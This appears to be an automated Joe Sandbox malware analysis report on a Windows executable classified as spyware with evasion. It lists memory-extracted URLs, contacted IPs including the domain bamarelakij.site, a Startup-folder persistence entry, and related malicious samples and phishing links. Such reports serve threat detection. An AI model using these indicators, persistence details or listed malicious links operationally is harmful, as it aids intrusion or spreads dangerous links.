                                                  http://www.reneelab.es/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.reneelab.comwww.reneelab.comhttp://https://0RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://bug.reneelab.com/psw_report.phpLicenseCodePSW_RENEELB_WINx86_20201003UserRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.reneelab.kr/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.reneelab.jp/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://xml.org/sax/features/namespacesRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                    		high
                                                    https://bamarelakij.site/roiLocalCtrl_alpha_v3.exe, 0000000C.00000003.2216963257.0000000000541000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://isecure.reneelab.com.cn/webapi.php?code=RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.winimage.com/zLibDll1.2.6RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.vmware.com/0/RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://downloads.reneelab.com/passnow/passnow_RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.reneelab.net/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.???.xx/?search=%sRescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://qt.digia.com/product/licensingRescueCDBurner.exe, 00000004.00000002.1574385035.000000006BDBE000.00000002.00000001.01000000.00000014.sdmpfalse
                                                        		high
                                                        http://trolltech.com/xml/features/report-start-end-entityUnknownRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                          		high
                                                          http://www.reneelab.net//reset-windows-password.htmlhttp://support.reneelab.com/anonymous_requests/nRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.symauth.com/cps0(RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.reneelab.com.cn/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.reneelab.it/reimpostare-passwordi-di-windows-login.htmlRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://isecure.reneelab.com.cn/webapi.php?code=http://isecure-a.reneelab.com/webapi.php?code=http://RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.symauth.com/rpa00RescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.info-zip.org/RescueCDBurner.exe, 00000003.00000002.1512217786.0000000009584000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A2C9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.00000000049F5000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000008.00000002.1843503254.0000000009840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://trolltech.com/xml/features/report-start-end-entityRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                  		high
                                                                  http://www.winimage.com/zLibDllRescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                    		high
                                                                    http://www.reneelab.com/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://isecure.reneelab.com/webapi.php?code=RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000003.1495961307.000000000A339000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://bugreports.qt-project.org/QHttpNetworkConnectionChannel::_q_receiveReply()RescueCDBurner.exe, 00000003.00000002.1514336862.000000006C859000.00000002.00000001.01000000.0000000A.sdmp, RescueCDBurner.exe, 00000004.00000002.1576336443.000000006D789000.00000002.00000001.01000000.00000013.sdmp, RescueCDBurner.exe, 00000008.00000002.1846154668.000000006D889000.00000002.00000001.01000000.00000013.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.reneelab.jp/product-land-286.htmlhttp://support.reneelab.com/anonymous_requests/newstore/RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://trolltech.com/xml/features/report-whitespace-only-CharDataRescueCDBurner.exe, 00000003.00000002.1514140369.000000006C789000.00000002.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000004.00000002.1576085712.000000006D6B9000.00000002.00000001.01000000.00000015.sdmpfalse
                                                                      		high
                                                                      http://www.surfok.de/cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://downloads.reneelab.com.cn/passnow/passnow_RescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.reneelab.biz/redefinir-senha-de-admin-logon-windows.htmlhttp://support.reneelab.com/anonyRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.softwareok.comRescueCDBurner.exe, 00000003.00000002.1512217786.00000000095DA000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1571394622.000000000A31F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1877507095.0000000004A3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://appsyndication.org/2006/appsynkXzODlqJak.exefalse
                                                                          		high
                                                                          http://www.reneelab.pl/product-land-280.htmlhttp://support.reneelab.com/anonymous_requests/newpurchaRescueCDBurner.exe, 00000003.00000002.1501545921.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1482868181.0000000000644000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000000.1499139510.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000002.1566448423.0000000000E84000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000008.00000000.1778577482.0000000000E84000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.250.65.161
                                                                          		unknownUnited States
                                                                          		15169GOOGLEUSfalse
                                                                          104.70.121.146
                                                                          		unknownUnited States
                                                                          		20940AKAMAI-ASN1EUfalse
                                                                          162.159.61.3
                                                                          		chrome.cloudflare-dns.comUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          40.79.167.8
                                                                          		unknownUnited States
                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          20.110.205.119
                                                                          		unknownUnited States
                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          204.79.197.219
                                                                          		unknownUnited States
                                                                          		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                          172.64.41.3
                                                                          		unknownUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          104.70.121.192
                                                                          		unknownUnited States
                                                                          		20940AKAMAI-ASN1EUfalse
                                                                          18.173.219.111
                                                                          		unknownUnited States
                                                                          		3MIT-GATEWAYSUSfalse
                                                                          18.244.18.38
                                                                          		sb.scorecardresearch.comUnited States
                                                                          		16509AMAZON-02USfalse
                                                                          104.70.121.217
                                                                          		unknownUnited States
                                                                          		20940AKAMAI-ASN1EUfalse
                                                                          104.21.80.52
                                                                          		bamarelakij.siteUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          184.51.149.176
                                                                          		unknownUnited States
                                                                          		20940AKAMAI-ASN1EUfalse
                                                                          239.255.255.250
                                                                          		unknownReserved
                                                                          		unknownunknownfalse

                                                                          Private

                                                                          IP
                                                                          192.168.2.7

                                                                          General Information

                                                                          Joe Sandbox version:42.0.0 Malachite
                                                                          Analysis ID:1586711
                                                                          Start date and time:2025-01-09 14:40:10 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 10m 55s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:29
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:kXzODlqJak.exe
                                                                          renamed because original name is a hash value
                                                                          Original Sample Name:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
                                                                          Detection:MAL
                                                                          Classification:mal92.spyw.evad.winEXE@64/279@19/15
                                                                          EGA Information:
                                                                          • Successful, ratio: 66.7%
                                                                          HCA Information:
                                                                          • Successful, ratio: 95%
                                                                          • Number of executed functions: 91
                                                                          • Number of non-executed functions: 271
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 199.232.210.172, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 142.250.185.238, 13.107.6.158, 108.141.37.120, 2.16.168.107, 2.16.168.120, 88.221.110.179, 88.221.110.195, 2.23.227.208, 2.23.227.215, 2.23.227.221, 2.21.65.132, 2.21.65.154, 13.74.129.1, 204.79.197.237, 13.107.21.237, 2.23.227.216, 2.23.227.197, 2.23.227.202, 2.16.168.122, 2.16.168.115, 48.209.164.47, 142.250.65.227, 142.250.80.3, 13.107.253.45, 52.149.20.212, 23.56.254.164, 94.245.104.56, 40.126.31.73, 13.107.246.40, 13.91.96.185, 20.96.153.111, 104.117.182.9, 23.200.0.34
                                                                          • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, c-bing-com.dual-a-0034.a-msedge.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, prod-agic-we-5.westeurope.cloudapp.azure.com, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, c-msn-com-nsatc.trafficmanager.net, time.windows.com, arc.msn.com, prod-agic-ne-4.northeurope.cloudapp.azure.com, www.bin
                                                                          • Execution Graph export aborted for target RescueCDBurner.exe, PID 7828 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                          • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: kXzODlqJak.exe

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          08:41:31API Interceptor1x Sleep call for process: kXzODlqJak.exe modified
                                                                          08:42:12API Interceptor22x Sleep call for process: LocalCtrl_alpha_v3.exe modified
                                                                          14:41:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helpmonitorv3.lnk

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          162.159.61.3bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                            malw.htaGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                              malw.htaGet hashmaliciousUnknownBrowse
                                                                                Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                  SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                    LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                      Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                        Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                            17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                              40.79.167.8file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                704b67b5-6bc9-dbd5-0710-60eb98e03983.emlGet hashmaliciousUnknownBrowse
                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    https://360merch-my.sharepoint.com/:u:/p/derek_cummins/Ee8aHkzMy41OgT5fOyc3qz4BdRJzT4bTlOlXY3v0Xazn9Q?e=hZ7jflGet hashmaliciousUnknownBrowse
                                                                                                      https://support.microsoft.com/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44Get hashmaliciousHTMLPhisherBrowse
                                                                                                        HImMAwx7yG.htmlGet hashmaliciousUnknownBrowse
                                                                                                          Factura.pdfGet hashmaliciousUnknownBrowse
                                                                                                            https://bauhausfurnituregroup-my.sharepoint.com/:f:/p/jcaviness/EuxDBQEPKl5GgFKsZtlqM6cBIeG-xo_6Y_SwA6y5sPoclQ?e=5%3ach0wDN&at=9&xsdata=MDV8MDJ8aGVscEB2Y2YuY29tfGViYjRlM2VmYWMxZjRjODhiZmIyMDhkYzkxMzRjYzAzfDVjMDJlODlhYjk2ODRkNGU5NjBkZTYyYzdjZDAyNzY2fDB8MHw2Mzg1NDQ5MDMyMDQzNjAxNTV8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDB8fHw%3d&sdata=US9GVzlGQVVpb0tMcWU1c3BhSjB0bDkrajM4RFJGWStqanVhSkg0NVR2MD0%3dGet hashmaliciousHTMLPhisherBrowse
                                                                                                              https://onset2.onsetcomp.com/files/software/hoboware/3.7.28/HOBOware_Free_Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                invoice 700898 for wallcentre.com.shtmlGet hashmaliciousUnknownBrowse
                                                                                                                  104.70.121.146file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                    file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                        20.110.205.119cLm7ThwEvh.msiGet hashmaliciousUnknownBrowse
                                                                                                                          bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                            LVkAi4PBv6.exeGet hashmaliciousUnknownBrowse
                                                                                                                              w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                  17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                    random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      random.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                                                                          6684V5n83w.exeGet hashmaliciousVidarBrowse

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            bamarelakij.sitew3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.21.80.52
                                                                                                                                            chrome.cloudflare-dns.combc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                            • 162.159.61.3
                                                                                                                                            Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                                            • 162.159.61.3
                                                                                                                                            SecurityScan_Release.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 162.159.61.3
